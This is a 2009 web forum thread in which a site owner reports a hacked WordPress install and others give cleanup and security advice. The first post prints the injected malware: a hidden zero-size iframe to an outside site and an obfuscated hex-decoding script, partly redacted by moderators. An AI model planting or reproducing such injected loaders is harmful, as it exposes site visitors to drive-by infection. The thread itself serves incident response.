homepage Welcome to WebmasterWorld Guest from 54.204.168.212
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Code, Content, and Presentation / HTML
Forum Library, Charter, Moderators: incrediBILL

HTML Forum

    
wordpress hacked?
tomhumf

5+ Year Member



 
Msg#: 3914958 posted 2:51 pm on May 16, 2009 (gmt 0)

Hi,

I've recently set up a wordpress site and it was working fine. Today however, it is constantly receiving and transmitting data from <a certain domain> and I don't know what this is?

I found the code below AFTER the </html> tags in the source code. It isn't in the wordpress footer so I'm not sure how it is getting there...

Any ideas how to get rid? I installed a couple of plugins, maybe this caused it.

///////////////////////////////

I just found the code hidden in the main index.php files of wordpress installation and deleted them out. It's working for now...i need to read the 'securing wordpress' thread

<iframe src="http://example.net/yes/index.php" width="0" height="0" style="display:none;"></iframe><script>function v4a0e9cd17b16a(v4a0e9cd17b553){ function v4a0e9cd17b93a () {var v4a0e9cd17bd23=16; return v4a0e9cd17bd23;} return(parseInt(v4a0e9cd17b553,v4a0e9cd17b93a()));}function v4a0e9cd17c10a(v4a0e9cd17c4f2){ var v4a0e9cd17d0a9=2; var v4a0e9cd17c8db='';for(v4a0e9cd17ccc2=0; v4a0e9cd17ccc2<v4a0e9cd17c4f2.length; v4a0e9cd17ccc2+=v4a0e9cd17d0a9){ v4a0e9cd17c8db+=(String.fromCharCode(v4a0e9cd17b16a(v4a0e9cd17c4f2.substr(v4a0e9cd17ccc2, v4a0e9cd17d0a9))));}return v4a0e9cd17c8db;} document.write(v4a0e9cd17c10a('[long alphanumeric string]'));></script>

[edited by: tedster at 4:27 pm (utc) on May 16, 2009]

[edited by: encyclo at 12:43 am (utc) on June 3, 2009]
[edit reason] obscure parts of the code, for safety [/edit]

 

tedster

WebmasterWorld Senior Member tedster us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3914958 posted 4:32 pm on May 16, 2009 (gmt 0)

Glad you got it fixed. Now, as you said, it's time to secure your Wordpress installation. There is a whole lot of server hacking these days, especially for Wordpress.

There's a thread in the Google Search forum that covers hacked servers [webmasterworld.com]. There are many different varieties, and they can kill your search traffic.

tomhumf

5+ Year Member



 
Msg#: 3914958 posted 6:39 pm on May 16, 2009 (gmt 0)

I found the code in 3 index.php in wordpress. Would my log files show exactly which files were modified in the hack?

I find them hard to read with windows 'default log viewer' is there anything else I could use to read them more easily on windows?

rickallen

10+ Year Member



 
Msg#: 3914958 posted 8:13 pm on Jun 2, 2009 (gmt 0)

I had a similar problem with code being added to index pages, but it turned out to be a server wide virus deal. If it comes back ask your hosting company about it.

I had a dedicated server and the "virus"/script trashed it.

webdesigncompany

5+ Year Member



 
Msg#: 3914958 posted 9:01 am on Jun 25, 2009 (gmt 0)

Hey guys i have problem with one of my wordpress blog as well.

<snip>

it says

This blog has been archived or suspended for a violation of our

any help would be good as i have lost that very good blog of mine.

[edited by: engine at 9:15 am (utc) on June 25, 2009]
[edit reason] No URLs, see WebmasterWorld TOS [/edit]

tedster

WebmasterWorld Senior Member tedster us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3914958 posted 6:57 pm on Jun 25, 2009 (gmt 0)

Hello webdesigncompany, and welcome to the forums. Click on the link in my earlier post (the linked words are "hacked servers") and you'll find a very complete discussion.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / HTML
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved